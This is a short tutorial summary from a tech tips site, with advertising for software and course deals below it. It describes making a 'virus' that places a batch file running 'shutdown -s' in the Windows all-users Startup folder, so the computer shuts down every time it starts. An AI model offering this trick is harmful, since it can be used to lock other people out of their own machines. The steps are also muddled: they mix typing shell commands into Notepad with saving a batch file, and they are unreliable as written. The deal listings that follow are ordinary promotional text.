This video shows the method to create a virus that will shutdown the PC whenever you try to turn it on. This should be done on your own responsibility. The first step involves opening the notepad. This can be done by either selecting the option from the 'Start' menu or from the icon on your desktop. In the following step, type 'cd C:\documents and settings\all users\start menu\programs\startup\
echo shutdown -s > "Owned.bat" '. The next step involves saving the following file as a batch file. Now open the file. You have now created your own virus for looping shutdown on your personal computer.
Want to master Microsoft Excel and take your work-from-home job prospects to the next level? Jump-start your career with our Premium A-to-Z Microsoft Excel Training Bundle from the new Gadget Hacks Shop and get lifetime access to more than 40 hours of Basic to Advanced instruction on functions, formula, tools, and more.
Other worthwhile deals to check out:
- 97% off The Ultimate 2021 White Hat Hacker Certification Bundle
- 98% off The 2021 Accounting Mastery Bootcamp Bundle
- 99% off The 2021 All-in-One Data Scientist Mega Bundle
- 59% off XSplit VCam: Lifetime Subscription (Windows)
- 98% off The 2021 Premium Learn To Code Certification Bundle
- 62% off MindMaster Mind Mapping Software: Perpetual License
- 41% off NetSpot Home Wi-Fi Analyzer: Lifetime Upgrades